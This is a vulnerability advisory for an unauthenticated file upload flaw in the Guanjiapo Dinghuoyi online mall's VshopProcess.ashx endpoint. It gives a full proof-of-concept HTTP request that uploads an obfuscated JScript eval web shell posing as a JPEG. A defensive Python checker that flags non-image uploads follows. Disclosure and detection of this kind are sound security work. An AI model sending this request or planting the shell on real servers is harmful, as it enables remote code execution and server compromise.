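Vulnerability description
任我行 (Renwoxing) was the first vendor to release the 管家婆 (Guanjiapo) integrated inventory (purchase, sales and stock) and finance software for small and medium-sized enterprises. 管家婆订货易在线商城 (Guanjiapo Dinghuoyi Online Mall) is a product that helps traditional enterprises build their own B2B ordering platform. The platform integrates multiple online channels, including PC, WeChat, app, mini-program and H5 mall, and connects seamlessly to the offline Guanjiapo ERP system. The VshopProcess.ashx endpoint of Guanjiapo Dinghuoyi Online Mall has an arbitrary file upload vulnerability: an unauthenticated attacker can use it to upload a malicious backdoor file, and further exploitation can lead to code execution and compromise of the server.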
POST /API/VshopProcess.ashx?action=PostFileImg HTTP/1.1
Host:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 992
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryirk5kyptosrklo8s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/57.0.578.100 Safari/537.36
------WebKitFormBoundaryirk5kyptosrklo8s
Content-Disposition: form-data; name="fileup1i"; filename="pol0qqmknz.aspx"
Content-Type: image/jpeg
<%@Page Language="Jscript"%>
<%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('MzYwN'+'jA7dm'+'FyIHN'+'hZmU9'+''+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('SQ=='))+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('bg=='))+char(0x271-0x21b)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('dQ=='))+char(0x250-0x1ed)+''+''+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('Mg=='))+char(267-197)+char(0x1874b/0x397)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('Wg=='))+char(0xde17/0x2ad)+''+'I7ZXZ'+'hbChS'+'ZXF1Z'+'XN0Lk'+'l0ZW1'+'bJ2Rh'+'eWluZ'+'yddLC'+'BzYWZ'+'lKTsx'+'MDgxO'+'DA7'+'')));%>
------WebKitFormBoundaryirk5kyptosrklo8s--
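A defender-side check for the request pattern above, added here as an example and not part of the original advisory or the vendor's code: it flags POSTs to /API/VshopProcess.ashx?action=PostFileImg whose uploaded filename does not carry an image extension, whatever Content-Type the part declares. The allowed-extension list (which assumes PostFileImg is meant for images), the function names and the sample requests are assumptions constructed for illustration.

```python
import email
from email import policy
from urllib.parse import urlsplit, parse_qs

# Assumption: PostFileImg is an image upload, so only these extensions are expected.
ALLOWED_IMAGE_EXT = {".jpg", ".jpeg", ".png", ".gif"}

def inspect_upload(raw: bytes) -> list:
    """Return findings for one raw HTTP request (headers + body) to the endpoint."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) < 2:
        return []
    method, url = parts[0].upper(), urlsplit(parts[1])
    actions = [v.lower() for k, vs in parse_qs(url.query).items()
               if k.lower() == "action" for v in vs]
    if (method != "POST" or not url.path.lower().endswith("/api/vshopprocess.ashx")
            or "postfileimg" not in actions):
        return []  # not the endpoint named in the advisory
    headers = {k.strip().lower(): v.strip()
               for k, v in (l.split(":", 1) for l in lines[1:] if ":" in l)}
    # Let the stdlib MIME parser split the multipart body into parts.
    mime = (b"Content-Type: " + headers.get("content-type", "").encode("latin-1")
            + b"\r\n\r\n" + body)
    msg = email.message_from_bytes(mime, policy=policy.default)
    findings = []
    for part in (msg.iter_parts() if msg.is_multipart() else []):
        name = (part.get_filename() or "").lower()
        ext = "." + name.rsplit(".", 1)[1] if "." in name else ""
        # The filename decides how the server treats the file, not the declared type.
        if name and ext not in ALLOWED_IMAGE_EXT:
            findings.append(f"{name}: extension {ext or '(none)'} is not an image type, "
                            f"declared as {part.get_content_type()}")
    return findings

def build_request(filename: str, ctype: str) -> bytes:
    """Constructed sample request; the body is a harmless placeholder."""
    b = "----constructedboundary"
    body = (f"--{b}\r\nContent-Disposition: form-data; name=\"file\"; "
            f"filename=\"{filename}\"\r\nContent-Type: {ctype}\r\n\r\nPLACEHOLDER\r\n--{b}--\r\n")
    return (f"POST /API/VshopProcess.ashx?action=PostFileImg HTTP/1.1\r\n"
            f"Host: shop.example.test\r\n"
            f"Content-Type: multipart/form-data; boundary={b}\r\n\r\n{body}").encode("latin-1")

if __name__ == "__main__":
    for fn in ("logo.jpg", "sample.aspx"):
        print(fn, inspect_upload(build_request(fn, "image/jpeg")))
```

The same rule can run over requests captured at a reverse proxy or WAF; since the advisory describes the endpoint as reachable without authentication, any hit deserves a check of the upload directory for unexpected files.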